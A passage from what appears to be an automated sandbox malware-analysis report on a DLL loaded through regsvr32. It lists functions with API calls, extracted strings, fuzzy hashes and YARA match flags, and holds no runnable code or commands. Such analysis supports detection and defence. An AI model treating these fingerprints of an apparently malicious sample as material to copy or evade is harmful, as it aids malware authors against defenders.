                                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E0E1
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E11B
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB9E12F
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96C64
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3), ref: 00007FFFEFB96C89
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CAD
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CB8
                                                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E145
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 2309262205-1052752507
                                                                                                                                • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                • Instruction ID: a5e91a8d6eb1185752f3068e23925e7acb5db671ffbb4394863164cee42ec792
                                                                                                                                • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                • Instruction Fuzzy Hash: C351B132A08A5386EB609F21984137A73D2FB447B4F548671DA6E83BF4DF3CE8408312
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB96F0C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB96FCF
                                                                                                                                • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB970DB
                                                                                                                                • WriteFile.KERNEL32 ref: 00007FFFEFB97115
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$HandleModuleNameWrite
                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                • API String ID: 3784150691-4022980321
                                                                                                                                • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                • Instruction ID: 18134d688881f170782960e9e0dd9f2f39c054624340d0fecf816bcc16dc0321
                                                                                                                                • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                • Instruction Fuzzy Hash: F951CE21B18A4342FB24DB25E9567BA32D6AF453B0F904236DD0D86AF6EF3CE1458202
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9E6C0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB9E6EB
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB9E7E2
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                • ___lc_codepage_func.LIBCMT ref: 00007FFFEFB9E76B
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 178205154-0
                                                                                                                                • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                • Instruction ID: 24d71c9817c895ef35ab3a35ec5e86eea76e758aa25bd23423899608774a85ec
                                                                                                                                • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                • Instruction Fuzzy Hash: 53D1D132A0C68386E7609F24D49077A3BD6BB81760F448175DA8D937F6DF3CE8518722
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C16C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: ACP$OCP$Qr2_:g
                                                                                                                                • API String ID: 2299586839-1853071874
                                                                                                                                • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                • Instruction ID: eb98bd5b97270a985f19340814b925571181a9cdf7f0c72077d26bccc28d69d5
                                                                                                                                • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                                • Instruction Fuzzy Hash: AF214AA1A08A4391FA60DB20E9503BA73E0EF487A8F958131DA4D476F5EF2CE955C706
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB94558 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 1445889803-1052752507
                                                                                                                                • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                • Instruction ID: fdd17853b9b49592da433b98183f7ebb1ef000c1fea98ecb34df41016c6da8c7
                                                                                                                                • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                • Instruction Fuzzy Hash: 49018421A29E4381EB518F21F89036573A5FB49BA0F456630DE5E477F0DF3CD8958701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9FCA0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$DecodePointer_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2175075375-0
                                                                                                                                • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                • Instruction ID: 93455b80a090a9308b66bccaba6f4accd5c349a83147e3a5e1d7115290df4566
                                                                                                                                • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                • Instruction Fuzzy Hash: 31318D22B1874342FB15AA6194527BA72D6AF847A4F448434DF0C4BBF6DF3CE8118742
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB96550 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1269745586-0
                                                                                                                                • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                • Instruction ID: 28cf75ed4ce4b2be4b78ea9d62023203e0fee006c9fa8619fc941f9cbfead9e9
                                                                                                                                • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                • Instruction Fuzzy Hash: 70311A72A0CB8682EA248B65E4403ABB3A4FB89754F504135DA8D43AA9EF7CD159CF01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C450 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale$_getptd
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 1743167714-1052752507
                                                                                                                                • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                • Instruction ID: 9aa35093e31948a61401df379762dfd686c72e2f3b943157d3e38c6663ed090b
                                                                                                                                • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                • Instruction Fuzzy Hash: 32616BB2B08A8797EA699E60D9453E9B3E1FB88315F404136D72D876F5CF3CE4648702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180003598 Relevance: 8.2, Strings: 6, Instructions: 720COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 1h$I-$IY$QL&$li7$o
                                                                                                                                • API String ID: 0-890095520
                                                                                                                                • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                                                                                • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000AC48 Relevance: 8.0, Strings: 6, Instructions: 548COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 1$ {,$"$$-%$Rku$ i
                                                                                                                                • API String ID: 0-1845893065
                                                                                                                                • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                                                                                • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180029B28 Relevance: 8.0, Strings: 6, Instructions: 535COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: VUS/$YV~$p$@$EX$OX
                                                                                                                                • API String ID: 0-2743166816
                                                                                                                                • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                                                                                • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
